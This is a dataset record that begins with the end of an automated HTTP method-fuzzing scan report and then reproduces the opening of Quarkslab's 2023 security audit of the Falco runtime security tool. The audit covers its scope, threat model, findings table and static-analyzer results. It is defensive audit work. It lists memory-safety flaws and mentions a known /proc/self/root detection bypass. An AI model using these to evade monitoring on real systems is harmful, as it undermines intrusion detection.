Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "SECURITY_AUDIT_2023_01_23-01-1097-LIV.pdf", "project_name": "Falco", "subcategory": "Security & Compliance" }
[ { "data": "Falco Security Audit\nReport\nReference 23-01-1097-LIV\nVersion 1.0\nDate 2023/01/16\nQuarkslab SAS\n10 boulevard Haussman\n75009 Paris\nFranceContents\n1 Project Information 1\n2 Executive summary 2\n2.1 Disclaimer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2\n2.2 Findings summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2\n3 Context and scope 4\n3.1 Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4\n3.2 Scope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4\n3.3 Audit settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5\n4 Discovery and state of the art 6\n4.1 Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6\n4.2 State of the art . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6\n5 Threat model 7\n5.1 A note on threat actors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8\n6 Static analysis 9\n6.1 Automated static analyzers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\n6.1.1 Cppcheck . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\n6.1.2 Infer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12\n6.1.3 CodeQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14\n6.1.4 Scan-Build . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15\n6.1.5 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17\n6.2 Manual review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\n6.2.1 Issues with readlink . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\n6.2.2 Checks on sensitive functions . . . . . . . . . . . . . . . . . . . . . . . . . 23\n6.2.3 Third-party dependencies version . . . . . . . . . . . . . . . . . . . . . . . 24\n6.2.4 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24\n7 Dynamic analysis 25\n7.1 Fuzzing the rules parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25\n7.2 Fuzzing the event processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28\n7.2.1 Using libprotobuf-mutator . . . . . . . . . . . . . . . . . . . . . . . . . . . 29\n7.2.2 Using syzkaller . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35\n7.2.3 Using the scap file format . . . . . . . . . . . . . . . . . . . . . . . . . . . 41\n7.3 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44\n8 Conclusion 45\nGlossary 46\nBibliography 47A Severity Classification 48\nB Infer report extracts 49\nC Scan-Build experimentations 54\nD Exploiting and debugging readlink issues 56\nE AFL++ persistent mode boilerplate 58\nF Fuzzing with libprotobuf-mutator 591 Project Information\nDocument history\nVersion Date Details Authors\n1.0 2023/01/16 Initial Version Victor Houal & Laurent Laubin & Mahé\nTardy\nQuarkslab\nContact Role Contact Address\nFrédéric Raynal CEO fraynal@quarkslab.com\nRamtine Tofighi Shirazi Project Manager mrtofighishirazi@quarkslab.com\nVictor Houal R&D Engineer Apprentice vhoual@quarkslab.com\nLaurent Laubin R&D Engineer llaubin@quarkslab.com\nMahé Tardy R&D Engineer mtardy@quarkslab.com\nFalco maintainers\nContact Company Contact Address\nFrederico Araujo IBM frederico.araujo@ibm.com\nJason Dellaluce Sysdig jasondellaluce@gmail.com\nMauro Ezequiel Moltrasio Red Hat mmoltras@redhat.com\nLeonardo Grasso Sysdig me@leonardograsso.com\nLuca Guerra Sysdig luca.guerra@sysdig.com\nTeryl Taylor IBM terylt@ibm.com\nMichele Zuccala Sysdig michele@zuccala.com\nOSTIF\nContact Role Contact Address\nDerek Zimmer President and Executive Director derek@ostif.org\nAmir Montazery Managing Director amir@ostif.org\nRef: 23-01-1097-LIV 1 Quarkslab SAS2 Executive summary\nThe goal of the audit was to assist the Falco maintainers to increase their security posture using\nstatic and dynamic analysis. Falco maintainers required an emphasis on fuzzing. To that end,\nQuarkslab’sengineersresearchedmultipletopicstoproviderecommendationsandrelevantadvice.\nIn addition, Quarkslab’s engineers assessed the code in order to find some issues, using automated\ntesting tools, fuzzing, or just by manually reviewing the code base.\nThis report describes the steps and research conducted by Quarkslab’s engineers on static analysis\nand fuzzing. In addition, readers can refer to Section 2.2 for the summary of findings that were\nfound during the audit.\nThe report starts with introductory sections, the next Section 3, describes the context and scope\nthat were decided for the audit, then Section 4 presents how the auditors got familiar with the\nproject and the state-of-the-art research that was conducted, accompanied by a bibliography.\nAfterwards, Section 5 presents the threat model that was created, with Section 6 and Section 7\npresenting the static and dynamic analysis resulting from the threat modeling. The section on\nstatic analysis presents static analyzers that were tested on the project with their results, while the\nsection on dynamic analysis illustrates and explains the research conducted on how fuzz-testing\nwas applied to various parts of the project.\n2.1 Disclaimer\nThis report reflects the work and results obtained within the duration of the audit on the specified\nscope (see Section 3.2) and as agreed between the OSTIF, Falco maintainers, and Quarkslab.\nTests are not guaranteed to be exhaustive and the report does not ensure the code is bug or\nvulnerability free.\n2.2 Findings summary\nThe following table synthesizes the various findings that were uncovered during the audit. The\nseverity classification given as informative, low, and medium, reflects a relative hierarchy between\nthe various findings of this report (see the table in Appendix A). It depends on the threat model\nand security properties considered.\nID Description Category Severity\nMEDIUM 1 Potential buffer overflow due to not null\nterminated output of readlink inlib-\nscap/scap_proc_file_rootBuffer overflow Medium\nLOW 1 Memory leak on errorstructure in lib-\nscap/engine/bpf/scap_bpf.c:513Memory Leak Low\nLOW 2 Resource leak on pfile inlib-\nscap/engine/kmod/scap_kmod.c:67Resource Leak Low\nRef: 23-01-1097-LIV 2 Quarkslab SASID Description Category Severity\nLOW 3 Memory leak on handlestructure in lib-\nscap/scap.c:146Memory Leak Low\nLOW 4 Memory leak on pAdapterInfo structure in\nlibscap/windows_hal.c:342Memory Leak Low\nLOW 5 Multiple unchecked return value from mal-\nloc,callocandreallocNull dereference Low\nLOW 6 Multiple unchecked return value from lo-\ncaltime ,sinsp_threadinfo::get_fd_-\ntableandscap_write_proclist_begin\nthat can return NullptrNull dereference Low\nLOW 7 Double free in libscap/scap.c function\nscap_openDouble free Low\nLOW 8 Garbage return value from stack in lib-\nsinsp/sinsp.cppGarbage return value Low\nLOW 9 Fournullterminationsofbufferswrittenout\nof range by one in libscap/scan_fds.cBuffer overflow Low\nINFO 1 Multiple bad handling of realloc return\nvalue inlibsinsp/filterchecks.cppMemory Leak Info\nINFO 2 Missingva_end() afterva_copy() in test\nfilesinsp_with_test_input.hIncorrect handling of\nvariadic macrosInfo\nINFO 3 Returned heap allocated buffer resolved\nafter being deallocatedReturn pointer on freed\nmemoryInfo\nINFO 4 MultiplepotentialNullpointerdereferences\nin macro HASH_ADD_INT64Null dereference Info\nINFO 5 Resource leak in libsinsp example lib-\nsinsp/examples/test.cppResource leak Info\nINFO 6 Dangerous construct in a vforked process in\nlibscap/engine/gvisor/runsc.cppIncorrect use of vfork Info\nINFO 7 Buffer overflow with not null terminated\noutput of readlink in debug code in lib-\nsinsp/parsers.cppBuffer overflow Info\nINFO 8 Return value in various usage of readlink\nnot checked which could lead to write to a\ndifferent fileUnchecked return value Info\nINFO 9 Multiple crashes in the parsing of scap files\nand event buffer with malformed filesNull dereference Info\nRef: 23-01-1097-LIV 3 Quarkslab SAS3 Context and scope\n3.1 Context\nFalco’s README introduces the project like that:\nThe Falco Project, originally created by Sysdig, is an incubating CNCF open-source\ncloud-native runtime security tool. Falco makes it easy to consume kernel events and\nenrich those events with information from Kubernetes and the rest of the cloud-native\nstack. Falco can also be extended to other data sources by using plugins. Falco has a\nrich set of security rules specifically built for Kubernetes, Linux, and cloud-native. If a\nrule is violated in a system, Falco will send an alert notifying the user of the violation\nand its severity.\nFalco monitors system calls to secure a system, by:\n•Parsing the Linux system calls from the kernel at runtime.\n•Asserting the stream against a powerful rules engine.\n•Alerting when a rule is violated.\nThe project ships with a default set of rules ready to be consumed by end-users to secure their\nKubernetes clusters. However, users can write their own rules using a syntax created by the\nproject for specific needs.\nHistorically, Falco was the first runtime security project to join CNCF as an incubation-level project.\n3.2 Scope\nThe scope of this audit was mainly the userspace part of Falco, distributed in the falcosecurity/falco\nandfalcosecurity/libs repositories on GitHub. Refer to Table 3.1 and 3.2 for URLs and commit\nhashes. The kernel module was investigated although it was not the focus of the audit. The\ndependencies and the plugins of Falco were left out of scope. The eBPF drivers of Falco also were\nnot investigated.\nThe Falco team requested assistance on:\n•building fuzzers for security-relevant areas;\n•building a threat model;\n•using and adding automatic static analysis in their pipeline;\n•looking for improper usage of cryptography;\n•manually searching for vulnerability, with an emphasis on memory safety.\nQuarkslab proposed a multi-step approach:\n•discovery of the project, its documentation, build system, architecture and codebase;\nRef: 23-01-1097-LIV 4 Quarkslab SAS•threat modeling;\n•static code review, including automatic and manual reviews;\n•dynamic testing and fuzzing.\n3.3 Audit settings\nSee below Table 3.1 and 3.2 for the versions used to conduct this audit. Most of the work was\nconducted on the libs repository, thus falco repository is needed to compile the final binary.\nProject falco\nRepository https://github.com/falcosecurity/falco\nCommit hash 44d1c1eb65031b8895b154139a1cc7bb545df60a\nCommit date 2022/10/19\nTag 0.33.0\nTable 3.1: falco version references\nProject libs\nRepository https://github.com/falcosecurity/libs\nCommit hash 74eec76d2c1dbba66a37db227d25a6b41987c1a6\nCommit date 2022/10/13\nTag 0.9.0\nTable 3.2: libs version references\nRef: 23-01-1097-LIV 5 Quarkslab SAS4 Discovery and state of the art\n4.1 Discovery\nFalco is overall well-documented and easy to integrate. The documentation is pretty comprehen-\nsive, well-written, and easy to follow. For example, to build and run Falco from the source, the\nofficial documentation is great [1]. A tutorial to run Falco on a minikube cluster is also available.1\nWe had no major difficulty to get familiar with the project and understand the cmake setup, the\nonly difficulty could be the high number of dependencies that Falco relies on.\n4.2 State of the art\nTo begin, an audit of Falco was conducted by Cure53 in mid-2019 [2]. They performed a manual\nanalysis of the source, some dynamic analysis, and tried to bypass the default set of rules. They\nfound some interesting bypass, configuration issues and crashes.\nWe noted that almost all the issues from the audit and security advisories were fixed except for\na symlink file bypass. Cure53 discussed this topic in their report, giving the example of using\n/proc/self/root to bypass detection on a specific path, like /etc/shadow . Open discussions are\nstill happening on how to prevent these issues [3].\nSpecifically on bypasses, Mark Manning, at the time at NCC Group, wrote about it at the end\nof 2019 [4]. Then, Brad Geesaman, at the time founding Darkbit, published a bypass article a\nyear after [5], September 2020. Then a Falco maintainer from Sysdig, Leonardo Di Donato, did a\npresentationatKubeConEurope2021Virtualonthesubject[6]. FinallyaresearcheratBlackberry,\nShay Berkovich presented a talk virtually at KubeCon Europe 2022 on new bypasses [7].\nThen, some articles are great to understand the inner workings of Falco, for example this official\nblog post about “Monitoring new syscalls with Falco” [8]. Or articles on personal blogs that try to\ngo deep into the code like this series on Falco design and the source code of Sysdig [9] [10].\nThe previous CVEs on Falco were investigated, first a CVE-2019-8339, a capacity-related vulnera-\nbility in which you can overflow the kernel with events to drop the control on sensitive ones [11].\nThe GitHub security advisory pages on Falco and libs repository [12], containing the recent\nsecurity issues were also looked into.\n1https://falco.org/docs/getting-started/source/\nRef: 23-01-1097-LIV 6 Quarkslab SAS5 Threat model\nFalco maintainers explicitly asked for a threat model, see Figure 5.1 for the threat model proposed\nby Quarkslab’s engineers.\nlibsinsp\nlibscap\nkernel\nprocfskernel\nmodule\nor eBPF syscallsprocess is \ncreatedprocess performs \na syscallrules in yaml \nconfig files\npluginsAttack surface\nscap_proc_scan_proc_dirsinsp_parser::process_eventfilter::parser::parse\nuser space\nkernel spaceadmin\naccess \nuser \naccess \ncreate\nreadcritical\nfunctionkernel \ndata \nFigure 5.1: Falco threat model\nThis threat model is a simplified view of the security threats on Falco and is not technically\ncomprehensive. For example, a process creation will also generate a syscall event, which is not\nrepresented on the diagram. The goal of this figure was to identify the security-relevant areas of\nFalco to head the audit in the most interesting direction.\nTo describe further this diagram:\n•the attack surface is represented in red, with items requiring admin access, in green, and\nitems accessible from a normal user using the system, in yellow.\n•Intheboxesinblue,youcanfindthepartsofthecodethatinteractwithsensitiveinformation,\nvia reading data represented with the blue arrows.\nRef: 23-01-1097-LIV 7 Quarkslab SAS•The sensitive parts of the code are reading directly from attack surface items, for the YAML\nconfig files for example, or indirectly from the system, with procfs or the syscalls events.\n•The dotted arrows just represent the relation between the attack surface and the system for\nthe indirect links.\n5.1 A note on threat actors\nOn the attack surface of Falco, it was important to separate what can be targeted by a superuser\n(i.e., root or admin) and a regular user on the system. Some of the work during this audit targeted\ncomponents that should be accessible only to superusers, see Section 7.1 for an example. This\nfuzzer was built, on one side, to get more familiar with the Falco project and on the other side\nbecause the rules files could theoretically be accessible to unprivileged users if the Linux file\nrights were badly configured.\nAn emphasis should be put on the fact that finding security issues that absolutely require to be a\nsuperuser (i.e., root) is less interesting because having those rights on the host already allows the\nsuperuser to disable Falco completely. Indeed, a superuser could stop the userland program of\nFalco or remove the kernel module, or eBPF probe directly. That’s why the threat model and this\naudit insisted on the attack surface that could be reached by a non-admin user of the system.\nConsidering Falco might be installed on Kubernetes clusters nodes, it’s safe to assume that most\nusers will be non-trusted unprivileged users, or diminished root users in containers. Indeed by\ndefault, as root in Kubernetes pods, the default set of Linux capabilities is restricted, which means\nroot doesn’t have all capabilities, like CAP_SYS_ADMIN or the ones allowing to reboot or remove\nand add kernel modules. In addition, other security mechanisms limit the access to /procor\n/sysas root.\nThepluralityof“rootstatus”incontainersenvironmentcreatessomeconfusion. Linuxcapabilities,\nnamespace and the various security modules allow to create more complex combination of rights.\nHowever, considering the most used configuration it should be clarified that regular users on\nthe system, i.e., unprivileged users or containerized root users in Kubernetes pods are the main\nthreat. Root users on the host and root users in privileged containers should be out of the scope of\nthe threat actors. As a matter of fact, privileged containers with root users are almost equivalent\nto root processes on the host: all except the process Linux namespace are disabled, all capabilities\nare granted, virtual file systems are unmasked and LSMs are disabled. It’s trivial to pivot from a\nprivilege container process to “complete root” on the host.\nRef: 23-01-1097-LIV 8 Quarkslab SAS6 Static analysis\n6.1 Automated static analyzers\nSome linters and static checkers were selected and tested on the project to find immediate issues\nbut also to see if they could be easily integrated to the project workflows. These tools were mainly\nselected because engineers at Quarkslab were familiar with them and they are (most of them)\nfree and open-source.\n•Cppcheck: a static analysis tool for C/C++ code.\n•CodeQL: a semantic code analysis engine to discover vulnerabilities across a codebase.\n•Infer: a static analysis tool for Java, C++, Objective-C, and C.\n•Scan-Build: a command line utility that enables a user to run the clang static analyzer over\ntheir codebase as part of performing a regular build.\nThese tools are different some of them are linters that can be directly run against the source\ncode, while others need the project to be built to create databases against which the analyzer can\nrun. Some already propose a set of embedded checks, while others are only engines and need\na curated selection of queries. Semgrep was also considered but the support of C/C++ is still\nexperimental.\n6.1.1 Cppcheck\nNote that despite the name, Cppcheck is designed for both C and C++. It can provide good\ninformation on potential memory and resource leaks for example and is really easy to run. It runs\ndirectly on source code and thus could be quickly integrated into a CI step. The version used was\nCppcheck 1.90.\nCppcheck was run on the codebase with the following command:\ncppcheck -j 32 -q --force <folder>\nThe-jflag is used to start 32 threads to do the checking work, the -qto only print something\nwhen there is an error and avoid progression message, --force for checking files that have a\nlot of configurations (using a lot of different combinations depending on C macro). To enable\nmore rules, is it possible to pass the --enable flag, for example --enable=all will output a lot\nof errors that could be associated with style, performance, portability, etc.\nFor this output, the userspace codebase was scanned with the basic checkers enabled.\nlibscap Thefirstissue, online1, isamemoryleakontheheapallocated errorstructure, indeed\nfree(error) should be added just before line 513 in engine/bpf/scap_bpf.c . The second one,\nline 4, is a resource leak, in the case fscanf(pfile, \"%\"PRIu32, &max) returns 0, the function\nwill return without calling fclose(3) . Then, line 7, is a memory leak similar to the first issue, on\nRef: 23-01-1097-LIV 9 Quarkslab SASline 146 of scap.c, afree(handle) should be added just before. For the issues line 10, 13 and\n16, it seems that the pAdapterInfo is allocated and then not used nor freed, which could lead to\na memory leak.\n1engine/bpf/scap_bpf.c:513:3: error: Memory leak: error [memleak]\n2return SCAP_FAILURE;\n3^\n4engine/kmod/scap_kmod.c:67:4: error: Resource leak: pfile [resourceLeak]\n5return 0;\n6^\n7scap.c:146:3: error: Memory leak: handle [memleak]\n8return NULL;\n9^\n10windows_hal.c:325:3: error: Memory leak: pAdapterInfo [memleak]\n11return SCAP_FAILURE;\n12^\n13windows_hal.c:331:3: error: Memory leak: pAdapterInfo [memleak]\n14return SCAP_FAILURE;\n15^\n16windows_hal.c:342:3: error: Memory leak: pAdapterInfo [memleak]\n17return SCAP_FAILURE;\n18^\nLOW 1 Memory leak on errorstructure in libscap/engine/bpf/scap_bpf.c:513\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nLOW 2 Resource leak on pfileinlibscap/engine/kmod/scap_kmod.c:67\nCategory Resource Leak\nRating Impact: Availability Exploitability : None\nLOW 3 Memory leak on handlestructure in libscap/scap.c:146\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nLOW 4 Memory leak on pAdapterInfo structure in libscap/windows_hal.c:342\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nRef: 23-01-1097-LIV 10 Quarkslab SASlibsinsp The first issue, on line 1, with the uninitvar is certainly a false positive. However,\nthememleakOnRealloc issues, on lines 4, 7, 10 are real programing mistakes1. The last one, on\nline 13, is also a real mistake but in the test files, so less problematic.\n1dns_manager.cpp:111:9: error: Uninitialized variable: dinfo [uninitvar]\n2return dinfo;\n3 ^\n4filterchecks.cpp:5174:3: error: Common realloc mistake: 'm_storage 'nulled but not\nfreed upon failure [memleakOnRealloc] ◁arrowhookleft→\n5m_storage = (char*)realloc(m_storage, encoded_args_len);\n6^\n7filterchecks.cpp:5326:5: error: Common realloc mistake: 'm_storage 'nulled but not\nfreed upon failure [memleakOnRealloc] ◁arrowhookleft→\n8 m_storage = (char*)realloc(m_storage, encoded_tags_len);\n9 ^\n10filterchecks.cpp:5810:4: error: Common realloc mistake: 'm_storage 'nulled but not\nfreed upon failure [memleakOnRealloc] ◁arrowhookleft→\n11m_storage = (char*)realloc(m_storage, encoded_tags_len);\n12^\n13test/sinsp_with_test_input.h:95:117: error: va_list 'args2 'was opened but not\nclosed by va_end(). [va_end_missing] ◁arrowhookleft→\n14throw std::runtime_error(\"the test framework does not currently support equal\ntimestamps or out of order events\"); ◁arrowhookleft→\nINFO 1 Multiple bad handling of realloc return value in libsinsp/filterchecks.cpp\nCategory Memory Leak\nRating Impact: Availability Exploitability : None\nINFO 2 Missingva_end() afterva_copy() in test file sinsp_with_test_input.h\nCategory Incorrect handling of variadic macros\nRating Impact: Integrity Exploitability : None\nchisel These three issues are the same, the function realpath_ex in\nuserspace/chisel/chisel_utils.cpp returns a pointer on freed memory. It seems to\nbe a mistake because a variable is created just before, named ret, on line 93, that might be the\nvariable that should be returned.\n1userspace/chisel/chisel_utils.cpp:95:2: error: Returning/dereferencing 'resolved '\nafter it is deallocated / released [deallocret] ◁arrowhookleft→\n2return resolved;\n3^\n1More details on how to properly checks the result of realloc: https://stackoverflow.com/a/27589881/4561420 .\nRef: 23-01-1097-LIV 11 Quarkslab SAS4userspace/chisel/chisel_utils.cpp:94:2: note: Returning/dereferencing 'resolved '\nafter it is deallocated / released ◁arrowhookleft→\n5free(resolved);\n6^\n7userspace/chisel/chisel_utils.cpp:95:2: note: Returning/dereferencing 'resolved '\nafter it is deallocated / released ◁arrowhookleft→\n8return resolved;\n9^\nINFO 3 Returned heap allocated buffer resolved after being deallocated\nCategory Return pointer on freed memory\nRating Impact: Availability Exploitability : None\n6.1.2 Infer\nInfer is an open-source static analysis tool designed for C, C++, Java and Objective-C code\nby Facebook. Similarly to Scan-Build or CodeQL, Infer uses the compilation step to create an\nintermediate representation of the program on which it can then run an analysis. The version\nused for Infer was 1.1.0.\nInfer 1.1.0 is using clang 11 and compiling the whole Falco project with dependencies with it\nwill cause errors during the build process because of tbb2. However, it is possible to build the\nproblematic dependency beforehand to avoid the issue. In addition, some implementations are\nmissingwhencompilingwiththeInfertoolchain,however,adding add_link_options(-latomic)\nfixes the issue.\nLike other tools that create databases during the building process, you need to explicitly ex-\nclude files from the included ones otherwise you end up with a lot of results coming from the\ndependencies code.\nWe managed to make Infer analyze the project with the following setup.\nvim CMakeLists.txt # add 'add_link_options(-latomic) '\nmkdir build-infer && cd build-infer\ninfer compile -- cmake -DUSE_BUNDLED_DEPS=ON ..\nmake -j `nproc `tbb\n2It seems that -flifetime-dse=1 , is not supported on clang 11 with Infer.\nRef: 23-01-1097-LIV 12 Quarkslab SASinfer capture --skip-analysis-in-path b64-prefix --skip-analysis-in-path\nc-ares-prefix --skip-analysis-in-path catch2-prefix --skip-analysis-in-path\ncloudtrail-plugin-prefix --skip-analysis-in-path cloudtrail-rules-prefix\n--skip-analysis-in-path cpp-httplib-prefix --skip-analysis-in-path curl-prefix\n--skip-analysis-in-path cxxopts-prefix --skip-analysis-in-path fakeit-prefix\n--skip-analysis-in-path grpc-prefix --skip-analysis-in-path jq-prefix\n--skip-analysis-in-path json-plugin-prefix --skip-analysis-in-path\nk8saudit-plugin-prefix --skip-analysis-in-path k8saudit-rules-prefix\n--skip-analysis-in-path njson-prefix --skip-analysis-in-path openssl-prefix\n--skip-analysis-in-path protobuf-prefix --skip-analysis-in-path re2-prefix\n--skip-analysis-in-path string-view-lite-prefix --skip-analysis-in-path\ntbb-prefix --skip-analysis-in-path valijson-prefix --skip-analysis-in-path\nyamlcpp-prefix --skip-analysis-in-path zlib-prefix -- make -j `nproc `◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\ninfer analyze\nResults\nDuring our scan, it found 105 issues. See the following list for comments on the results, you\nwill need Infer report to follow, you can find the report under the name infer-report.txt or\nan abbreviated version in the Appendix B containing only the errors mentioned in the following\ncomments.\n•27 Null Dereferences - 13 of these errors come from unchecked return value from malloc,\ncalloc andrealloc that could lead to Null dereferences, it is errors number 9, 15, 16, 25,\n28, 29, 42, 45, 52, 57, 59, 74 and 80.\nError number 17 is similar, on error localtime(3) returns Null which is not checked in\nthe code. Errors 54, 56 and 69 are very similar, sinsp_threadinfo::get_fd_table can\nreturn Null and the value is not checked, it’s even immediately dereferenced for case 69.\nFor error 79, potentially scap_write_proclist_begin can return Null and the returned\npointer is dereferenced in scap_write_proclist_end later.\nErrors 43, 51, 53, 67, 68, 70, 71, 87 and 88 are issues of dereferences in hashmap macro\nHASH_ADD_INT64 .\n•7 Resource Leaks - interestingly, the first resource leak, number 13 is the same as the\none detected by Cppcheck in libscape/engine/kmod/scap_kmod.c and is valid. See low\nRecommendation 2.\nError number 24 is a false positive, it’s not considering sinsp_logger destructor that is\nproperly closing the related files.\nError number 38 is a real issue but in libsinsp/examples/test.cpp which is not sensitive.\nErrors 60, 61 and 62 are false positives since these files descriptors are saved and the files\nare closed by calling scap_dump_close .\nThe last error 78 seems to be a false positive because the normal flow actually closedir on\nthetaskdir_p properly and the error flow as well.\n•26 Dead Stores - 9 of these errors are raised from the driver folder. While dead stores do\nnot have security implications by themselves, the compiler optimizing them out can lead to\nRef: 23-01-1097-LIV 13 Quarkslab SASsecurity issues if the underlying memory should be rewritten. However, it does not seem\nthat these dead stores are because of memory reset for sensitive information. They can still\nbe checked for program correctness because they might imply a programming mistake (a\nvar assigned in the place of another).\n•17 Static Initialization Order Fiascos - all these errors come from detection on GTest\nTEST_CASE macro. We can consider them as false positives and due to the use of GTest.\n•28 Uninitialized Values - these errors seems to be false positive of access to uninitialized\nvariables.\nLOW 5 Multiple unchecked return value from malloc,callocandrealloc\nCategory Null dereference\nRating Impact: Availability Exploitability : None\nLOW 6 Multiple unchecked return value from localtime ,sinsp_threadinfo::get_-\nfd_table andscap_write_proclist_begin that can return Nullptr\nCategory Null dereference\nRating Impact: Availability Exploitability : None\nINFO 4 Multiple potential Null pointer dereferences in macro HASH_ADD_INT64\nCategory Null dereference\nRating Impact: Availability Exploitability : None\nINFO 5 Resource leak in libsinsp example libsinsp/examples/test.cpp\nCategory Resource leak\nRating Impact: Availability Exploitability : None\n6.1.3 CodeQL\nFirst, contrary to the other tools mentioned here, CodeQL is not entirely open source. It’s free\nfor research and open source, the queries are open source but the engine is closed source and\npublished as a binary. It was originally built by a company named Semmle that hosted the product\nonlgtm.com with the idea of massively scanning open-source projects. Semmle was acquired\nby GitHub (itself owned by Microsoft) and is now integrating CodeQL into github.com and\ndeprecating lgtm.com . The versions used were CodeQL command-line toolchain release 2.11.2\nand the Visual Studio Code extension v1.7.5.\nTo use CodeQL, an SQL database of the source code and data flow must be built prior to analysis.\nRef: 23-01-1097-LIV 14 Quarkslab SAScodeql database create --language=cpp -j 32 --ram=25000 --command=\"make -j 32\"\nfalco-db ◁arrowhookleft→\nNote that the --language=cpp flag includes C code as well, the -jand--ramflags are to adjust\nthe process of creation to our resources available, the --command flag allows to pass a custom\nbuild command to trigger the compilation and the last argument is the name of the database\nfolder.\nWarning\nBecause CodeQL is creating a database based on everything that was compiled dur-\ning the build the process, it results in a pretty large database, including information\nabout the dependencies like OpenSSL, protobuf, curl, etc.\nThis is the main issue with using CodeQL on Falco at the moment because executing\nany queries on the resulting database can lead to a lot of noise from dependencies\nand thus make the results difficult to browse.\nBecause CodeQL does not come bundled with predefined queries, it’s more complicated to\nexhibit particular results from the analysis. However, the open source queries can be found\nin thegithub/codeql3repository. And especially, C and C++ queries, can be found under\ncodeql/cpp/ql/src4.\nThe rule sets used were the ones under Security/CWE andCritical . There were a lot of outputs,\nwith a lot of noise, coming from dependencies and false positives. The results will not be printed\nhere but they were an important inspiration for the manual review. The queries were run through\nthe Visual Studio Code extension of CodeQL.\n6.1.4 Scan-Build\nScan-Build is a tool to run the Clang static analyzer5, part of the LLVM project, on a codebase.\nYou can also use CodeChecker instead of Scan-Build6which might be more adequate for large\nprojects. During a project build, as source files are compiled they are also analyzed in tandem by\nthe static analyzer. Upon completion of the build, results are then presented to the user within a\nweb browser. The version used of Scan-Build is the one packaged with the LLVM 10 clang-tools\npackage on Ubuntu 20.04.\nSimilarly to Infer and CodeQL, this tool requires compiling the codebase and checking the built\ncode. Thus, it, by default, raises tons of alerts on dependencies that were built along Falco.\nAt first, we struggled to make Scan-Build work on the project, see Appendix C for more details.\nFinally, we used the following command to scan and output only the bugs found on Falco’s\ncodebase and it worked, resulting in 202 warnings (with 41 “bugs” from the security checkers\nthat are mostly just grepping some sensitive functions, which could be disabled):\n3https://github.com/github/codeql\n4https://github.com/github/codeql/tree/main/cpp/ql/src\n5https://clang-analyzer.llvm.org/\n6https://clang-analyzer.llvm.org/command-line.html\nRef: 23-01-1097-LIV 15 Quarkslab SAScmake 